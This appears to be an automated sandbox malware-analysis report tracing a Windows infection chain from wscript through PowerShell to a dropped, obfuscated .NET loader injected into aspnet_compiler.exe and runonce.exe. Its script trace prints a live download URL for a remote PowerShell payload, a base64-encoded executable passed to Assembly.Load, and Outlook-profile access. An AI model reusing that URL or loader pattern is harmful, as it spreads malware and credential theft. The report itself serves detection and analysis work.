                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: runonce.pdbGCTL source: aspnet_compiler.exe, 00000004.00000002.2213460510.0000000000958000.00000004.00000020.00020000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2974936676.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.2213941533.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2213305486.00000000041C1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.0000000004530000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2215237417.000000000437B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.2213941533.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 00000009.00000003.2213305486.00000000041C1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.0000000004530000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2215237417.000000000437B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\VZBXV4444.pdb source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr
                Source: Binary string: runonce.pdb source: aspnet_compiler.exe, 00000004.00000002.2213460510.0000000000958000.00000004.00000020.00020000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2974936676.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\VZBXV4444.pdbBSJB source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xBjKgBCuI1jq.exe, 00000008.00000000.2132371221.000000000021F000.00000002.00000001.01000000.0000000A.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000000.2281413073.000000000021F000.00000002.00000001.01000000.0000000A.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:215 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:230 f:i a0:371");ITextStream.WriteLine(" exit:230 f:i r:%22CreateObject%22");ITextStream.WriteLine(" entry:235 f:i a0:384");ITextStream.WriteLine(" exit:235 f:i r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:226 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:226 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:244 f:i a0:371");ITextStream.WriteLine(" exit:244 f:i r:%22CreateObject%22");IHost.Name();ITextStream.WriteLine(" entry:240 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:240 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:574 f:executeWorkflow");ITextStream.WriteLine(" exec:532 f:executeWorkflow");ITextStream.WriteLine(" entry:540 f:ensureFolderExists a0:%22C%3A%5CTemp%22");ITextStream.WriteLine(" exec:250 f:ensureFolderExists");ITextStream.WriteLine(" entry:263 f:j a0:368");ITextStream.WriteLine(" exit:263 f:j r:%22FolderExists%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:259 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:259 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:273 f:j a0:372");ITextStream.WriteLine(" exit:273 f:j r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:269 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:269 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" exit:540 f:ensureFolderExists r:undefined");ITextStream.WriteLine(" entry:544 f:downloadFile a0:%22https%3A%2F%2Ffiles.catbox.moe%2Fet18ob.ps1%22 a1:%22C%3A%5CTemp%5Cdownloaded_script.ps1%22");ITextStream.WriteLine(" exec:279 f:downloadFile");ITextStream.WriteLine(" entry:295 f:k a0:377");ITextStream.WriteLine(" exit:295 f:k r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:289 o: f:Open a0:%22GET%22 a1:%22https%3A%2F%2Ffiles.catbox.moe%2Fet18ob.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://files.catbox.moe/et18ob.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:289 o: f:Open r:undefined");ITextStream.WriteLine(" entry:306 f:k a0:367");ITextStream.WriteLine(" exit:306 f:k r:%22Send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:302 o: f:Send");IServerXMLHTTPRequest2.send();ITextStream.WriteLine(" exit:244 f:i r:%22CreateObject%22");IHost.Name();ITextStream.WriteLine("
                Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr, c44edb08c29bd3d9f67391663c7fff46c.cs.Net Code: c04f5269ae129eb13e190297e8bd95169 System.Reflection.Assembly.Load(byte[])
                Source: 1.2.powershell.exe.1cfdb03c4a0.0.raw.unpack, c44edb08c29bd3d9f67391663c7fff46c.cs.Net Code: c04f5269ae129eb13e190297e8bd95169 System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041F04F push ebx; ret 4_2_0041F058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00403280 push eax; ret 4_2_00403282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041AB61 pushfd ; ret 4_2_0041AB78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041ABD6 push ds; ret 4_2_0041ABD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040D38A push edx; iretd 4_2_0040D453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00426CC3 pushad ; iretd 4_2_00426CEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004084DA push esi; retf 4_2_004084DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004084FF push ebp; iretd 4_2_00408502
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00412559 push ecx; iretd 4_2_0041255A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004125DC pushfd ; iretd 4_2_004125FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00405E25 push ecx; ret 4_2_00405E2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00401F0E push ss; retf 4_2_00401F14
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EFB008 push es; iretd 4_2_00EFB009
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EF225F pushad ; ret 4_2_00EF27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EF1368 push eax; iretd 4_2_00EF1369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EF27FA pushad ; ret 4_2_00EF27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EF283D push eax; iretd 4_2_00EF2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F209AD push ecx; mov dword ptr [esp], ecx4_2_00F209B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EF9939 push es; iretd 4_2_00EF9940
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045609AD push ecx; mov dword ptr [esp], ecx9_2_045609B6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260527C push ebp; iretd 9_2_0260527F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02605257 push esi; retf 9_2_0260525A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260F2D6 push ecx; iretd 9_2_0260F2D7
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260F359 pushfd ; iretd 9_2_0260F378
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02623A40 pushad ; iretd 9_2_02623A68
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02617B60 push FFFFFFC3h; ret 9_2_02617BCA
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02602BA2 push ecx; ret 9_2_02602BA8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_026178DE pushfd ; ret 9_2_026178F5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02617953 push ds; ret 9_2_02617955
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0261BDCC push ebx; ret 9_2_0261BDD5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04416482 push cs; retf 9_2_04416492
                Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.drStatic PE information: section name: .text entropy: 7.983510833209405
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9D1C0 rdtsc 4_2_00F9D1C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
